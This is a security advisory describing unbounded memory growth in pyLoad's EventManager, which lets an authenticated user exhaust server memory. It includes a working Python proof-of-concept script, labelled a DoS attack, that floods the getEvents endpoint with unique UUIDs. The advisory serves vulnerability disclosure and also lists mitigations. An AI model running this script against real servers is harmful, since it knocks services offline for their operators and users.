GHSA-c2f9-4mc8-j656

Suggest an improvement
Source
https://github.com/advisories/GHSA-c2f9-4mc8-j656
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-c2f9-4mc8-j656/GHSA-c2f9-4mc8-j656.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-c2f9-4mc8-j656
Aliases
  • CVE-2026-48987
Published
2026-07-09T13:35:28Z
Modified
2026-07-09T13:45:36.126277673Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
pyLoad: Unbounded Memory Growth Leading to DoS and Potential DDoS in EventManager
Details

Description:

The EventManager module in pyload manages a list of Client instances for subscribing to events. The addition of each unique uuid from the get_events API causes the creation of a Client instance that gets appended to the clients list. Although there is a clean() method available in the EventManager module for removing non-responding Client instances, this method is never used in the EventManager or in the entire core application code. Consequently, this causes an uncontrolled growth in memory consumption until it becomes exhausted, resulting in a DoS attack.

Vulnerable Code:

https://github.com/pyload/pyload/blob/355c3f8d78a91f72d049e58f1edee8a972f845eb/src/pyload/core/managers/event_manager.py#L16-L17

Here the client is added to the clients list but never cleared the inactive clients.

Exploitation:

  1. Start pyLoad server (Ensure the pyload server is running)
  2. Authenticate: Obtain a session cookie or an API key (Here i used the API key).
  3. Send Requests: Run the below poc script to send a large number of requests to the getEvents API endpoint, each with a unique uuid.
    import requests
    import uuid
    import time
    
    # Configuration
    URL = "http://localhost:8000/api/getEvents"
    NUM_REQUESTS = 100000
    
    headers = {
        "X-API-Key" : "<YOUR_APIKEY>"
    }
    
    print(f"Starting DoS attack: sending {NUM_REQUESTS} unique UUIDs...")
    
    for i in range(NUM_REQUESTS):
       # Generating a new UUID
        uid = str(uuid.uuid4())
        try:
            # Sending request
            requests.get(URL, params={"uuid": uid}, headers=headers, timeout=5)
            if i % 1000 == 0:
                print(f"Sent {i} requests...")
        except requests.exceptions.RequestException as e:
            print(f"Error at request {i}: {e}")
            break
    
    print("Attack complete. Check memory usage.")
    
    
  4. Monitor Memory: Monitor the memory usage of the pyload process (e.g., using top, ps or the following commands).

    PID=$(pgrep -f "pyload"); while true; do ps -o rss= -p $PID; sleep 1; done
    
  5. Observe Growth: Notice that the memory consumption increases and never decreases, even after the requests stop and 30 seconds.

https://github.com/user-attachments/assets/28d460c9-655d-45a1-a47f-c0f4d196f686

Impact:

  • Denial of Service (DoS). The pyload process will consume all available system memory, leading to an Out-of-Memory (OOM) kill by the operating system or system-wide instability, affecting other services on the host.

Mitigations:

  • Invoke clean(): Call self.clean() at the beginning of the get_events method to purge inactive clients before processing new ones.
  • Rate Limiting: Implement rate limiting on the getEvents endpoint to prevent a single client from flooding the server with unique UUIDs.
Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-09T13:35:28Z",
    "nvd_published_at": null,
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-400",
        "CWE-401",
        "CWE-770"
    ]
}
References

Affected packages

PyPI / pyload-ng

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
0.5.0b3.dev100

Affected versions

0.*
0.5.0a5.dev528
0.5.0a5.dev532
0.5.0a5.dev535
0.5.0a5.dev536
0.5.0a5.dev537
0.5.0a5.dev539
0.5.0a5.dev540
0.5.0a5.dev545
0.5.0a5.dev562
0.5.0a5.dev564
0.5.0a5.dev565
0.5.0a6.dev570
0.5.0a6.dev578
0.5.0a6.dev587
0.5.0a7.dev596
0.5.0a8.dev602
0.5.0a9.dev615
0.5.0a9.dev629
0.5.0a9.dev632
0.5.0a9.dev641
0.5.0a9.dev643
0.5.0a9.dev655
0.5.0a9.dev806
0.5.0b1.dev1
0.5.0b1.dev2
0.5.0b1.dev3
0.5.0b1.dev4
0.5.0b1.dev5
0.5.0b2.dev9
0.5.0b2.dev10
0.5.0b2.dev11
0.5.0b2.dev12
0.5.0b3.dev13
0.5.0b3.dev14
0.5.0b3.dev17
0.5.0b3.dev18
0.5.0b3.dev19
0.5.0b3.dev20
0.5.0b3.dev21
0.5.0b3.dev22
0.5.0b3.dev24
0.5.0b3.dev26
0.5.0b3.dev27
0.5.0b3.dev28
0.5.0b3.dev29
0.5.0b3.dev30
0.5.0b3.dev31
0.5.0b3.dev32
0.5.0b3.dev33
0.5.0b3.dev34
0.5.0b3.dev35
0.5.0b3.dev38
0.5.0b3.dev39
0.5.0b3.dev40
0.5.0b3.dev41
0.5.0b3.dev42
0.5.0b3.dev43
0.5.0b3.dev44
0.5.0b3.dev45
0.5.0b3.dev46
0.5.0b3.dev47
0.5.0b3.dev48
0.5.0b3.dev49
0.5.0b3.dev50
0.5.0b3.dev51
0.5.0b3.dev52
0.5.0b3.dev53
0.5.0b3.dev54
0.5.0b3.dev57
0.5.0b3.dev60
0.5.0b3.dev62
0.5.0b3.dev64
0.5.0b3.dev65
0.5.0b3.dev66
0.5.0b3.dev67
0.5.0b3.dev68
0.5.0b3.dev69
0.5.0b3.dev70
0.5.0b3.dev71
0.5.0b3.dev72
0.5.0b3.dev73
0.5.0b3.dev74
0.5.0b3.dev75
0.5.0b3.dev76
0.5.0b3.dev77
0.5.0b3.dev78
0.5.0b3.dev79
0.5.0b3.dev80
0.5.0b3.dev81
0.5.0b3.dev82
0.5.0b3.dev85
0.5.0b3.dev87
0.5.0b3.dev88
0.5.0b3.dev89
0.5.0b3.dev90
0.5.0b3.dev91
0.5.0b3.dev92
0.5.0b3.dev93
0.5.0b3.dev94
0.5.0b3.dev95
0.5.0b3.dev96
0.5.0b3.dev97
0.5.0b3.dev98
0.5.0b3.dev99
0.5.0b3.dev100

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-c2f9-4mc8-j656/GHSA-c2f9-4mc8-j656.json"